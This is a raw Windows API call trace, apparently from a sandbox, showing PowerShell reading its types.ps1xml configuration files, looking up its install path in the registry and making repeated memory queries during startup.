	[0310.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.668] SetErrorMode (uMode=0x1) returned 0x1
	[0310.669] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0310.670] GetFileType (hFile=0x334) returned 0x1
	[0310.670] SetErrorMode (uMode=0x1) returned 0x1
	[0310.670] GetFileType (hFile=0x334) returned 0x1
	[0310.673] ReadFile (in: hFile=0x334, lpBuffer=0x2c906f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2c906f8*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0310.676] ReadFile (in: hFile=0x334, lpBuffer=0x2c906f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2c906f8*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0310.676] ReadFile (in: hFile=0x334, lpBuffer=0x2c906f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2c906f8*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0310.677] ReadFile (in: hFile=0x334, lpBuffer=0x2c906f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2c906f8*, lpNumberOfBytesRead=0x28d148*=0xcf3, lpOverlapped=0x0) returned 1
	[0310.677] ReadFile (in: hFile=0x334, lpBuffer=0x2c8fb53, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2c8fb53*, lpNumberOfBytesRead=0x28d148*=0x0, lpOverlapped=0x0) returned 1
	[0310.677] ReadFile (in: hFile=0x334, lpBuffer=0x2c906f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2c906f8*, lpNumberOfBytesRead=0x28d148*=0x0, lpOverlapped=0x0) returned 1
	[0310.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.680] SetErrorMode (uMode=0x1) returned 0x1
	[0310.680] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d0c0 | out: lpFileInformation=0x28d0c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0310.680] SetErrorMode (uMode=0x1) returned 0x1
	[0310.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.681] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d1a8 | out: phkResult=0x28d1a8*=0x334) returned 0x0
	[0310.681] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d12c, lpData=0x0, lpcbData=0x28d128*=0x0 | out: lpType=0x28d12c*=0x1, lpData=0x0, lpcbData=0x28d128*=0x56) returned 0x0
	[0310.681] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e4890
	[0310.681] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d0fc, lpData=0x1b7e4890, lpcbData=0x28d0f8*=0x56 | out: lpType=0x28d0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d0f8*=0x56) returned 0x0
	[0310.682] CoTaskMemFree (pv=0x1b7e4890) 
	[0310.682] RegCloseKey (hKey=0x334) returned 0x0
	[0310.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0311.262] GetSystemInfo (in: lpSystemInfo=0x28bde0 | out: lpSystemInfo=0x28bde0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0311.262] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0311.833] SetErrorMode (uMode=0x1) returned 0x1
	[0311.834] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0311.834] GetFileType (hFile=0x334) returned 0x1
	[0311.834] SetErrorMode (uMode=0x1) returned 0x1
	[0311.834] GetFileType (hFile=0x334) returned 0x1
	[0311.834] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.834] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.834] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.834] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.835] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.835] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.835] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.835] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.835] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.836] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.836] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.837] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.837] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.837] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.837] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.837] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.838] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.839] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.839] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.839] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.840] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.840] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.840] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.840] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.840] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.841] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.841] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.841] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.841] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.842] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.842] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.842] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.842] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.844] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.845] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.845] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.845] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.845] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.846] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.846] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.846] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1000, lpOverlapped=0x0) returned 1
	[0311.846] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x1b4, lpOverlapped=0x0) returned 1
	[0311.846] ReadFile (in: hFile=0x334, lpBuffer=0x2b5dec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d148, lpOverlapped=0x0 | out: lpBuffer=0x2b5dec0*, lpNumberOfBytesRead=0x28d148*=0x0, lpOverlapped=0x0) returned 1
	[0311.847] CloseHandle (hObject=0x334) returned 1
	[0311.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0311.847] SetErrorMode (uMode=0x1) returned 0x1
	[0312.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d0c0 | out: lpFileInformation=0x28d0c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0312.410] SetErrorMode (uMode=0x1) returned 0x1
	[0312.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0312.410] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d1a8 | out: phkResult=0x28d1a8*=0x304) returned 0x0
	[0312.411] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d12c, lpData=0x0, lpcbData=0x28d128*=0x0 | out: lpType=0x28d12c*=0x1, lpData=0x0, lpcbData=0x28d128*=0x56) returned 0x0
	[0312.411] CoTaskMemAlloc (cb=0x5a) returned 0x149850
	[0312.411] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d0fc, lpData=0x149850, lpcbData=0x28d0f8*=0x56 | out: lpType=0x28d0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d0f8*=0x56) returned 0x0
	[0312.411] CoTaskMemFree (pv=0x149850) 
	[0312.411] RegCloseKey (hKey=0x304) returned 0x0
	[0312.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0312.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0313.863] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.871] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.873] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.873] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.873] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.874] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.874] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.876] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.886] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.886] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.886] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.887] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.887] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.887] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.887] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.887] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.895] VirtualQuery (in: lpAddress=0x28be90, lpBuffer=0x28cd50, dwLength=0x30 | out: lpBuffer=0x28cd50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
